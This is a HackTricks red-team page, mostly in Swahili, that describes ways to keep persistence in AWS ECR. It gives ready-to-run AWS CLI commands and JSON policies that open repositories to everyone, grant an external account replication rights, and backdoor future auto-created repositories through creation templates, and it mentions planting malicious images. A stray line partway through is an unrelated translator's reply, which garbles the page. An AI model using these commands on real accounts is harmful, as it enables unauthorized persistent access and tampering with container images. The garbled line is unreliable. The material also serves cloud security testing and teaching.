AWS - ECR Persistence

Reading time: 5 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

ECR

Kwa taarifa zaidi angalia:

AWS - ECR Enum

Hidden Docker Image with Malicious Code

Mshambulizi anaweza kupakia Docker image inayobeba malicious code kwenye ECR repository na kuitumia kudumisha persistence katika target AWS account. Mshambulizi anaweza kisha kupeleka image yenye malicious kwa huduma mbalimbali ndani ya account, kama Amazon ECS au EKS, kwa njia ya kuficha.

Repository Policy

Ongeza policy kwa repository moja ikikupa wewe (au kila mtu) access kwa repository:

bash
aws ecr set-repository-policy \
--repository-name cluster-autoscaler \
--policy-text file:///tmp/my-policy.json

# With a .json such as

{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}

warning

Tambua kwamba ECR inahitaji watumiaji kuwa na idhini ya kuita API ya ecr:GetAuthorizationToken kupitia sera ya IAM kabla ya wao kuweza kuthibitisha kwenye registry na push au pull images yoyote kutoka kwenye Amazon ECR repository.

Sera ya Registry & Nakili Kati ya Akaunti

Inawezekana kunakili moja kwa moja registry katika akaunti ya nje kwa kusanidi cross-account replication, ambapo unahitaji kuonyesha akaunti ya nje unayotaka kunakili registry.

Kwanza, unahitaji kumpa akaunti ya nje ufikiaji wa registry kwa sera ya registry kama:

bash
aws ecr put-registry-policy --policy-text file://my-policy.json

# With a .json like:

{
"Sid": "asdasd",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::947247140022:root"
},
"Action": [
"ecr:CreateRepository",
"ecr:ReplicateImage"
],
"Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
}

I don't have the README.md content or the replication config. Please paste the README.md text and the replication config you want applied. I will then translate the relevant English to Swahili, preserving all markdown/html tags, links, paths and code as you requested.

bash
aws ecr put-replication-configuration \
--replication-configuration file://replication-settings.json \
--region us-west-2

# Having the .json a content such as:
{
"rules": [{
"destinations": [{
"region": "destination_region",
"registryId": "destination_accountId"
}],
"repositoryFilters": [{
"filter": "repository_prefix_name",
"filterType": "PREFIX_MATCH"
}]
}]
}

Repository Creation Templates (prefix backdoor for future repos)

Tumia vibaya ECR Repository Creation Templates ili ku-backdoor kwa otomatiki repository yoyote ambayo ECR huunda kwa auto chini ya prefix iliyodhibitiwa (kwa mfano kupitia Pull-Through Cache au Create-on-Push). Hii inatoa ufikiaji wa kudumu usioidhinishwa kwa repos za baadaye bila kugusa zile zilizopo.

  • Ruhusa zinazohitajika: ecr:CreateRepositoryCreationTemplate, ecr:DescribeRepositoryCreationTemplates, ecr:UpdateRepositoryCreationTemplate, ecr:DeleteRepositoryCreationTemplate, ecr:SetRepositoryPolicy (used by the template), iam:PassRole (kama role maalum imeambatanishwa na template).
  • Athari: Kila repository mpya inayoundwa chini ya prefix lengwa inarithi kwa otomatiki repository policy inayodhibitiwa na mshambuliaji (mfano, cross-account read/write), tag mutability, na scanning defaults.
Backdoor future PTC-created repos under a chosen prefix
bash
# Region
REGION=us-east-1

# 1) Prepare permissive repository policy (example grants everyone RW)
cat > /tmp/repo_backdoor_policy.json <<'JSON'
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "BackdoorRW",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer",
"ecr:InitiateLayerUpload",
"ecr:UploadLayerPart",
"ecr:CompleteLayerUpload",
"ecr:PutImage"
]
}
]
}
JSON

# 2) Create a Repository Creation Template for prefix "ptc2" applied to PULL_THROUGH_CACHE
aws ecr create-repository-creation-template   --region $REGION   --prefix ptc2   --applied-for PULL_THROUGH_CACHE   --image-tag-mutability MUTABLE   --repository-policy file:///tmp/repo_backdoor_policy.json

# 3) Create a Pull-Through Cache rule that will auto-create repos under that prefix
#    This example caches from Amazon ECR Public namespace "nginx"
aws ecr create-pull-through-cache-rule   --region $REGION   --ecr-repository-prefix ptc2   --upstream-registry ecr-public   --upstream-registry-url public.ecr.aws   --upstream-repository-prefix nginx

# 4) Trigger auto-creation by pulling a new path once (creates repo ptc2/nginx)
acct=$(aws sts get-caller-identity --query Account --output text)
aws ecr get-login-password --region $REGION | docker login --username AWS --password-stdin ${acct}.dkr.ecr.${REGION}.amazonaws.com

docker pull ${acct}.dkr.ecr.${REGION}.amazonaws.com/ptc2/nginx:latest

# 5) Validate the backdoor policy was applied on the newly created repository
aws ecr get-repository-policy --region $REGION --repository-name ptc2/nginx --query policyText --output text | jq .

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks